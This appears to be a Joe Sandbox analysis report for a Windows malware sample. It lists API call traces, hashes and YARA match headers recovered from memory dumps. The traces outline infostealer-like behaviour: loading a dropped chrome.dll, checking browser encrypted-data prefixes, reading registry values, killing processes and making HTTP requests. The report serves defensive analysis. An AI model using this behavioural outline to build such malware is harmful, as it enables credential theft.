                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                      • String ID:
                                      • API String ID: 2677904052-0
                                      • Opcode ID: 754e135dd435b5109bd89d6f633deaab1f2fe0ec03a021116c7625d90a29a748
                                      • Instruction ID: 6a0ff70b50f372ddacf98c3747f80918e5662d230628af4a30a49d31d20304e4
                                      • Opcode Fuzzy Hash: 754e135dd435b5109bd89d6f633deaab1f2fe0ec03a021116c7625d90a29a748
                                      • Instruction Fuzzy Hash: 4D3182B1E051099FDB04EBE4EC54DFE7736AB44305F105619E102A32A0EB74FA85CB92
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 048C5281
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 048C5288
                                      • InternetOpenA.WININET(00420DE3,00000000,00000000,00000000,00000000), ref: 048C52A1
                                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 048C52C8
                                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 048C52F8
                                      • memcpy.MSVCRT(00000000,?,00000001), ref: 048C5341
                                      • InternetCloseHandle.WININET(?), ref: 048C5370
                                      • InternetCloseHandle.WININET(?), ref: 048C537D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                      • String ID:
                                      • API String ID: 1008454911-0
                                      • Opcode ID: 9d9a8564c17c37c6ab9290f4ff10c49815d7cff8932d35ae010a82ac5e0e1cea
                                      • Instruction ID: 7b09e40d2eebfec3754e175d0c75c6c3751b2335651d3b6ec2ebc66d5da739c2
                                      • Opcode Fuzzy Hash: 9d9a8564c17c37c6ab9290f4ff10c49815d7cff8932d35ae010a82ac5e0e1cea
                                      • Instruction Fuzzy Hash: B93119B4E01228EBDB20CF94DC84BDCB7B5AB48304F5086D9F609A7280D7B06AC58F59
                                      APIs
                                        • Part of subcall function 048DAD97: lstrlen.KERNEL32(048C51BC,?,?,048C51BC,00420DDF), ref: 048DADA2
                                        • Part of subcall function 048DAD97: lstrcpy.KERNEL32(00420DDF,00000000), ref: 048DADFC
                                        • Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF
                                      • StrCmpCA.SHLWAPI(00000000,004210B0,00000000), ref: 048D5AFB
                                      • StrCmpCA.SHLWAPI(00000000,004210B8), ref: 048D5B58
                                      • StrCmpCA.SHLWAPI(00000000,004210C8), ref: 048D5D0E
                                        • Part of subcall function 048DAD17: lstrcpy.KERNEL32(?,00000000), ref: 048DAD5D
                                        • Part of subcall function 048D56A7: StrCmpCA.SHLWAPI(00000000,00421074), ref: 048D56DF
                                        • Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C
                                        • Part of subcall function 048D5777: StrCmpCA.SHLWAPI(00000000,00421084,00000000), ref: 048D57CF
                                        • Part of subcall function 048D5777: lstrlen.KERNEL32(00000000), ref: 048D57E6
                                        • Part of subcall function 048D5777: StrStrA.SHLWAPI(00000000,00000000), ref: 048D581B
                                        • Part of subcall function 048D5777: lstrlen.KERNEL32(00000000), ref: 048D583A
                                        • Part of subcall function 048D5777: strtok.MSVCRT(00000000,?), ref: 048D5855
                                        • Part of subcall function 048D5777: lstrlen.KERNEL32(00000000), ref: 048D5865
                                      • StrCmpCA.SHLWAPI(00000000,004210C0,00000000), ref: 048D5C42
                                      • StrCmpCA.SHLWAPI(00000000,004210D0,00000000), ref: 048D5DF7
                                      • StrCmpCA.SHLWAPI(00000000,004210D8), ref: 048D5EC3
                                      • Sleep.KERNEL32(0000EA60), ref: 048D5ED2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$Sleepstrtok
                                      • String ID:
                                      • API String ID: 3630751533-0
                                      • Opcode ID: 0eb3445eed1b3daeda1f2162748cb05894813a744caa4cc26cce728cb2d7be17
                                      • Instruction ID: 42adfbeebba5fda8e49c5c5bd79f6aa2f18e5f7ffea7e204c21e0083d3325bcf
                                      • Opcode Fuzzy Hash: 0eb3445eed1b3daeda1f2162748cb05894813a744caa4cc26cce728cb2d7be17
                                      • Instruction Fuzzy Hash: 76E12331902204ABDB18FBA8DC95DED7379AF54204F508B6DE447E6094EFB5BB08CB52
                                      APIs
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                        • Part of subcall function 00419850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,004108DC,C:\ProgramData\chrome.dll), ref: 00419871
                                        • Part of subcall function 0040A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,?,004108E4), ref: 0040A098
                                      • StrCmpCA.SHLWAPI(00000000,02EB23E0), ref: 00410922
                                      • StrCmpCA.SHLWAPI(00000000,02EB22F0), ref: 00410B79
                                      • StrCmpCA.SHLWAPI(00000000,02EB2430), ref: 00410A0C
                                        • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                      • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00410C35
                                      Strings
                                      • C:\ProgramData\chrome.dll, xrefs: 004108CD
                                      • C:\ProgramData\chrome.dll, xrefs: 00410C30
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                      • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                      • API String ID: 585553867-663540502
                                      • Opcode ID: bc4131eb9470a0b30c78486560b6eeb5eaf7b01ec90574bc2a426dfa5c06d41b
                                      • Instruction ID: 798b8003b846a09b6b7b20e33334a9dbf0f3b1503011c00658a7b4d9c0c3a9bc
                                      • Opcode Fuzzy Hash: bc4131eb9470a0b30c78486560b6eeb5eaf7b01ec90574bc2a426dfa5c06d41b
                                      • Instruction Fuzzy Hash: DCA176717001089FCB18EF65D996FED7776AF94304F10812EE40A5F391EB349A49CB9A
                                      APIs
                                      • memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                      • memcmp.MSVCRT(?,v10,00000003), ref: 0040A5D2
                                      • memset.MSVCRT ref: 0040A60B
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 0040A664
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcmp$AllocLocallstrcpymemset
                                      • String ID: @$v10$v20
                                      • API String ID: 631489823-278772428
                                      • Opcode ID: 3de6848b35251bb0137415eef7a32c473c67b893c9d08e2ffe65091eb629360f
                                      • Instruction ID: deead5598e30f73acd49a71965db0b9c26184f2a73657d717c04d8255e3e8135
                                      • Opcode Fuzzy Hash: 3de6848b35251bb0137415eef7a32c473c67b893c9d08e2ffe65091eb629360f
                                      • Instruction Fuzzy Hash: 7C518E30610208EFCB14EFA5DD95FDD7775AF40304F008029F90A6F291DB78AA55CB5A
                                      APIs
                                      • memset.MSVCRT ref: 048C158E
                                        • Part of subcall function 048C1507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 048C151B
                                        • Part of subcall function 048C1507: RtlAllocateHeap.NTDLL(00000000), ref: 048C1522
                                        • Part of subcall function 048C1507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 048C153E
                                        • Part of subcall function 048C1507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 048C155C
                                        • Part of subcall function 048C1507: RegCloseKey.ADVAPI32(?), ref: 048C1566
                                      • lstrcat.KERNEL32(?,00000000), ref: 048C15B6
                                      • lstrlen.KERNEL32(?), ref: 048C15C3
                                      • lstrcat.KERNEL32(?,0042640C), ref: 048C15DE
                                        • Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF
                                        • Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
                                        • Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
                                        • Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89
                                        • Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C
                                        • Part of subcall function 048D8F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,048C1660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250DC,00420E1A), ref: 048D8F7D
                                        • Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
                                        • Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 048C16CC
                                        • Part of subcall function 048DAD17: lstrcpy.KERNEL32(?,00000000), ref: 048DAD5D
                                        • Part of subcall function 048CA377: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 048CA3A3
                                        • Part of subcall function 048CA377: GetFileSizeEx.KERNEL32(000000FF,?), ref: 048CA3C8
                                        • Part of subcall function 048CA377: LocalAlloc.KERNEL32(00000040,?), ref: 048CA3E8
                                        • Part of subcall function 048CA377: ReadFile.KERNEL32(000000FF,?,00000000,048C16F6,00000000), ref: 048CA411
                                        • Part of subcall function 048CA377: LocalFree.KERNEL32(048C16F6), ref: 048CA447
                                        • Part of subcall function 048CA377: CloseHandle.KERNEL32(000000FF), ref: 048CA451
                                      • DeleteFileA.KERNEL32(00000000), ref: 048C1756
                                      • memset.MSVCRT ref: 048C177D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                      • String ID:
                                      • API String ID: 3885987321-0
                                      • Opcode ID: 2a97d6376cda74d6d1336d73f706b43986f81e299c9fded5963d5511903ee699
                                      • Instruction ID: babdb762142458a22e298c0f2f14ca5ebb6ba90f9593987c7c31f16e53ea8230
                                      • Opcode Fuzzy Hash: 2a97d6376cda74d6d1336d73f706b43986f81e299c9fded5963d5511903ee699
                                      • Instruction Fuzzy Hash: C95176B1D4121897DB18FB64DC94FED73389F54305F504AE9A60AE2090EFB06B88CF96
                                      APIs
                                      • lstrcatA.KERNEL32(?,02EB5978,?,00000104,?,00000104,?,00000104,?,00000104), ref: 00414A2B
                                        • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00414A51
                                      • lstrcatA.KERNEL32(?,?), ref: 00414A70
                                      • lstrcatA.KERNEL32(?,?), ref: 00414A84
                                      • lstrcatA.KERNEL32(?,02E35AB0), ref: 00414A97
                                      • lstrcatA.KERNEL32(?,?), ref: 00414AAB
                                      • lstrcatA.KERNEL32(?,02EB5E10), ref: 00414ABF
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                        • Part of subcall function 00418F20: GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F
                                        • Part of subcall function 004147C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004147D0
                                        • Part of subcall function 004147C0: HeapAlloc.KERNEL32(00000000), ref: 004147D7
                                        • Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147F6
                                        • Part of subcall function 004147C0: FindFirstFileA.KERNEL32(?,?), ref: 0041480D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                      • String ID:
                                      • API String ID: 167551676-0
                                      • Opcode ID: 58dba1b2860d6428ec47f78fe100ccd670a24cdb85e4827545ce54862c89c4bc
                                      • Instruction ID: a5c2d428b28de13255d2ac7946ab4b1842291e6be0275f36c7222d1bbee1b90f
                                      • Opcode Fuzzy Hash: 58dba1b2860d6428ec47f78fe100ccd670a24cdb85e4827545ce54862c89c4bc
                                      • Instruction Fuzzy Hash: F93160B2D0421867CB14FBB0DC95EDD733EAB48704F40458EB20596091EE78A7C8CB99
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004199C5
                                      • Process32First.KERNEL32(0040A056,00000128), ref: 004199D9
                                      • Process32Next.KERNEL32(0040A056,00000128), ref: 004199F2
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00419A4E
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00419A6C
                                      • CloseHandle.KERNEL32(00000000), ref: 00419A79
                                      • CloseHandle.KERNEL32(0040A056), ref: 00419A88
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                      • String ID:
                                      • API String ID: 2696918072-0
                                      • Opcode ID: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                      • Instruction ID: 88ad4043d03276f3ee8d31f644ab7db47d0d0c060b431017ba6a9ada5f45e9a4
                                      • Opcode Fuzzy Hash: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                      • Instruction Fuzzy Hash: 06211A70900258ABDB25DFA1DC98BEEB7B9BF48304F0041C9E509A6290D7789FC4CF51
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 048D9C2C
                                      • Process32First.KERNEL32(048CA2BD,00000128), ref: 048D9C40
                                      • Process32Next.KERNEL32(048CA2BD,00000128), ref: 048D9C59
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 048D9CB5
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 048D9CD3
                                      • CloseHandle.KERNEL32(00000000), ref: 048D9CE0
                                      • CloseHandle.KERNEL32(048CA2BD), ref: 048D9CEF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                      • String ID:
                                      • API String ID: 2696918072-0
                                      • Opcode ID: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                      • Instruction ID: bea2bf10e7e47b53d79e5bb15174b41607d68ce51f856ec118bf55d5e8399f4f
                                      • Opcode Fuzzy Hash: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                      • Instruction Fuzzy Hash: AF212CB4905218EBDB21DF55CC88BEDB7B9BB48304F0046C9E50AA7290D774AB84CF91
                                      APIs
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4AA1
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4AB8
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4ACF
                                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 048C4AF0
                                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 048C4B00
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??2@$CrackInternetlstrlen
                                      • String ID: <
                                      • API String ID: 1683549937-4251816714
                                      • Opcode ID: 38fa8a5d9863c97f5ae2059ef35c5811aeca24f1de16073e8a310d0be37fc7a1
                                      • Instruction ID: b5ba638479372f2b68545b55b2f44c25a5b411641b7f2a5ce69a0edb79194b4f
                                      • Opcode Fuzzy Hash: 38fa8a5d9863c97f5ae2059ef35c5811aeca24f1de16073e8a310d0be37fc7a1
                                      • Instruction Fuzzy Hash: 92213E71D00219EBDF14DFA8EC49ADD7B74FF44320F108225E925A7290EB706A05CF91
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 048D7A9B
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 048D7AA2
                                      • RegOpenKeyExA.ADVAPI32(80000002,006D6D98,00000000,00020119,00000000), ref: 048D7AD4
                                      • RegQueryValueExA.ADVAPI32(00000000,006D6E34,00000000,00000000,?,000000FF), ref: 048D7AF5
                                      • RegCloseKey.ADVAPI32(00000000), ref: 048D7AFF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: Windows 11
                                      • API String ID: 3225020163-2517555085
                                      • Opcode ID: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
                                      • Instruction ID: 8f1bda9618eeb2df5c2b66197292837467a899c03196e94c4cd199e0973d43cf
                                      • Opcode Fuzzy Hash: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
                                      • Instruction Fuzzy Hash: F2014F79E06309BBEB00DBE4ED49F6D77B9EF48701F004596FA05E6290E770AA408B91
                                      APIs
                                      • CreateFileA.KERNEL32(>=A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413D3E,?), ref: 0041948C
                                      • GetFileSizeEx.KERNEL32(000000FF,>=A), ref: 004194A9
                                      • CloseHandle.KERNEL32(000000FF), ref: 004194B7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSize
                                      • String ID: >=A$>=A
                                      • API String ID: 1378416451-3536956848
                                      • Opcode ID: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
                                      • Instruction ID: 3a34b71ed32a5e038d40ec36a38ffc71a9509a973990dc3d9b0a1b42c7eefbe1
                                      • Opcode Fuzzy Hash: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
                                      • Instruction Fuzzy Hash: F2F04F39E08208BBDB10DFB0EC59F9E77BAAB48710F14C655FA15A72C0E6749A418B85
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 048C7601
                                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 048C7678
                                      • StrStrA.SHLWAPI(00000000,0042191C,00000000), ref: 048C76D4
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 048C7719
                                      • HeapFree.KERNEL32(00000000), ref: 048C7720
                                        • Part of subcall function 048C94F7: vsprintf_s.MSVCRT ref: 048C9512
                                      • task.LIBCPMTD ref: 048C781C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                      • String ID:
                                      • API String ID: 700816787-0
                                      • Opcode ID: a5f9a1fdff9748d1a9f61811aedc3a3ddb92c22d9917be86b6004c4e8ac4beea
                                      • Instruction ID: 501701255a239e354dff8039a9a6912bafd89d49f895c6e557837237bb34d468
                                      • Opcode Fuzzy Hash: a5f9a1fdff9748d1a9f61811aedc3a3ddb92c22d9917be86b6004c4e8ac4beea
                                      • Instruction Fuzzy Hash: 8B611EB594016D9BEB24DF64CC44FD9B7B8BF48304F0086E9E649A6140EBB0ABC5CF91
                                      APIs
                                        • Part of subcall function 048DAD17: lstrcpy.KERNEL32(?,00000000), ref: 048DAD5D
                                        • Part of subcall function 048C6537: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 048C6598
                                        • Part of subcall function 048C6537: StrCmpCA.SHLWAPI(?,006D6E80), ref: 048C65BA
                                        • Part of subcall function 048C6537: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 048C65EC
                                        • Part of subcall function 048C6537: HttpOpenRequestA.WININET(00000000,00421B58,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 048C663C
                                        • Part of subcall function 048C6537: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 048C6676
                                        • Part of subcall function 048C6537: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 048C6688
                                        • Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C
                                      • StrCmpCA.SHLWAPI(00000000,00421084,00000000), ref: 048D57CF
                                      • lstrlen.KERNEL32(00000000), ref: 048D57E6
                                        • Part of subcall function 048D9227: LocalAlloc.KERNEL32(00000040,-00000001), ref: 048D9249
                                      • StrStrA.SHLWAPI(00000000,00000000), ref: 048D581B
                                      • lstrlen.KERNEL32(00000000), ref: 048D583A
                                      • strtok.MSVCRT(00000000,?), ref: 048D5855
                                      • lstrlen.KERNEL32(00000000), ref: 048D5865
                                        • Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                      • String ID:
                                      • API String ID: 3532888709-0
                                      • Opcode ID: 54e8cafad978ddb8dec0665b67f894f20834dab0c8411e0b23f3d73ca0531f9d
                                      • Instruction ID: c40e09c8e71571d7eb3209f36dc6350cd8a45f2ec47d42091356a1e7016a0b3a
                                      • Opcode Fuzzy Hash: 54e8cafad978ddb8dec0665b67f894f20834dab0c8411e0b23f3d73ca0531f9d
                                      • Instruction Fuzzy Hash: 30510130902108ABDB1CFF68DD95EED7735AF10309F604A69D806E7590EBB57B04CB52
                                      APIs
                                      • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 048D75C5
                                        • Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF
                                      • OpenProcess.KERNEL32(001FFFFF,00000000,048D77F4,004205C5), ref: 048D7603
                                      • memset.MSVCRT ref: 048D7651
                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 048D77A5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
